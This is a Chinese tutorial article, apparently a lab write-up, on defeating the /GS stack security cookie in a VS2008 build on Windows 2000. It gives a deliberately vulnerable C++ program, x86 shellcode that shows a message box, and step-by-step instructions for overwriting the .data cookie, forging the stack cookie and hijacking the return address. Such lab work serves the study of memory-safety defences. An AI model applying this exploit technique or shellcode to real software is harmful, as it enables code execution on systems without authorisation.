脚本之家 服务器常用软件
快捷导航
您的位置:首页软件编程C 语言 → C++替换栈中和.data中的cookie

C++替换栈中和.data中的cookie实现步骤详解

 更新时间:2022年10月18日 15:40:41   作者:sliver呀  
这篇文章主要介绍了C++替换栈中和.data中的cookie实现步骤,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习吧

一、实验环境

操作系统:Windows 2000 professional

软件版本:原版OD(实时调试)、VS2008(release)

二、实验代码

#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
/*
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
*/
char shellcode[]=
"\x90\x90\x90\x90"//new value of cookie in .data
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xF4\x6F\x82\x90"//result of \x90\x90\x90\x90 xor EBP
"\x90\x90\x90\x90"
"\x94\xFE\x12\x00"//address of shellcode
;
void test(char * str, int i, char * src)
{
	char dest[200];
	if(i<0x9995)
	{
		char * buf=str+i;
		*buf=*src;
		*(buf+1)=*(src+1);
		*(buf+2)=*(src+2);
		*(buf+3)=*(src+3);
	    strcpy(dest,src);
	}
}
void main()
{
	__asm int 3
	char * str=(char *)malloc(0x10000);
	test(str,0xFFFF2FB8,shellcode);	
}

代码分析:

(1)test函数会修改s+i到s+i+3(内存地址)中保存的数据;

(2)test函数中strcpy存在典型的溢出漏洞。

三、实验步骤

1、security cookie机制

直接运行到if语句处;

产生:程序将0x403000处保存的值,赋给EAX,将EAX与EBP异或,异或结果(security cookie)存储在EAX中,然后将EAX中的值(也就是security cookie)保存在EBP-4处。

验证:程序从EBP-4处取出值,然后与EBP异或,最后将异或结果与0x00403000处的Cookie进行比较,如果二者一致则校验通过,否则转入校验失败哦的异常处理。

同时可以看到security cookie存放在0x12FF60处。

现在的重点是:

  • 将.data中保存的原cookie改为\x90\x90\x90\x90;
  • 用\x90\x90\x90\x90与EBP的值进行异或,并替换security cookie;
  • 将test函数的返回地址改为shellcode的起始地址,带程序返回时,即可执行shellcode.

2、获取堆区起始地址

调试代码:

#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
void test(char * str, int i, char * src)
{
	char dest[200];
	if(i<0x9995)
	{
		char * buf=str+i;
		*buf=*src;
		*(buf+1)=*(src+1);
		*(buf+2)=*(src+2);
		*(buf+3)=*(src+3);
	    strcpy(dest,src);
	}
}
void main()
{
	__asm int 3
	char * str=(char *)malloc(0x10000);
	test(str,0xFFFF2FB8,shellcode);	
}

编译,运行完malloc函数:

可见malloc获取的堆区的起始地址为0x410048。

如何判断堆区在哪儿呢?

  • 单步跳过call语句,有些寄存器的值会变红,说明执行完这一函数后,寄存器中的值改变了,实在不会,就将数据窗口依次跳到相应位置。
  • 需要多0x178这一偏移地址警惕,因为0x178在堆分配的时候,是空表索引freelist[0]的内存地址;因为堆初始化的时候,只有一个尾块链在freelist[0]处的,且初次分配的时候是从尾块前面“切”的,所以此处会出现0x390178.

故,可以断定,0x410048为申请的空间的起始地址,也就是str的值。

3、修改.data中的原始cookie

查看.data在内存中的起始地址;

可见.data在内存中的起始地址为0x403000。

0x403000属于低地址,0x410048属于高地址,因为i并没有规定上限,因此只需将i设置为0xFFFF2FB8即可让str指向0x403000。

可见,.data中的原cookie已经被覆盖。

4、查看栈区dest的起始地址

可以在OD中看到粗线部分,起始就是strcpy函数。可见起始地址为0x12FE94.

5、构造shellcode

计算security cookie时的EBP为0x12FF64,.data存放的原cookie改为\x90\x90\x90\x90,伪造的security cookie就是0x90826FF4.

security cookie应存放在0x12FF60,dest的起始地址为0x12FE94,所以shellcode可以这样构造:

将构造好的shellcode复制到程序中,运行:

strcpy之后,可见security cookie和test函数的返回地址都被覆盖了!

F9运行:

到此这篇关于C++替换栈中和.data中的cookie实现步骤详解的文章就介绍到这了,更多相关C++替换栈中和.data中的cookie内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • C++连接并使用MySQL数据库

    C++连接并使用MySQL数据库

    这篇文章主要为大家详细介绍了C++连接并使用MySQL数据库,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2020-07-07
  • C++高并发内存池的整体设计和实现思路

    C++高并发内存池的整体设计和实现思路

    这篇文章主要介绍了C++高并发内存池的整体设计和实现思路详解,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2021-07-07
  • C语言实现纸牌24点小游戏

    C语言实现纸牌24点小游戏

    这篇文章主要为大家详细介绍了C语言实现纸牌24点小游戏,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2019-10-10
  • C++ OpenCV中几种基本的图像处理方式

    C++ OpenCV中几种基本的图像处理方式

    大家好,本篇文章主要讲的是C++ OpenCV中几种基本的图像处理方式,感兴趣的同学赶快来看一看吧,对你有帮助的话记得收藏一下
    2022-01-01
  • QT中QChart绘制折线图

    QT中QChart绘制折线图

    本文主要介绍了QChart绘制折线图,Qt Charts基于Qt的Graphics View架构,其核心组件是QChartView 和 QChart,感兴趣的可以了解一下
    2022-04-04
  • C 语言基础之C语言的常见关键字

    C 语言基础之C语言的常见关键字

    C语言中有一些预先定义的字符串,他们本身被赋予了自身的功能。并且我们在定义变量的时候,不能去抢他们的名字来用。他们就是今天的主角:关键字,下面文章将给大家做详细介绍
    2021-09-09
  • C及C++ 基础循环示例详解

    C及C++ 基础循环示例详解

    这篇文章主要介绍了C及C++ 中的循环示例详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2022-09-09
  • C++实现LeetCode(104.二叉树的最大深度)

    C++实现LeetCode(104.二叉树的最大深度)

    这篇文章主要介绍了C++实现LeetCode(104.二叉树的最大深度),本篇文章通过简要的案例,讲解了该项技术的了解与使用,以下就是详细内容,需要的朋友可以参考下
    2021-07-07
  • C++ 实现线程安全的频率限制器(推荐)

    C++ 实现线程安全的频率限制器(推荐)

    这篇文章主要介绍了在 C++ 中实现一个线程安全的频率限制器,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2020-05-05
  • C++实现单例模式日志输出详解

    C++实现单例模式日志输出详解

    这篇文章主要为大家详细介绍了C++中单例模式的相关知识,并给出单例模式日志实现,文中的示例代码讲解详细,感兴趣的小伙伴可以了解一下
    2023-04-04

最新评论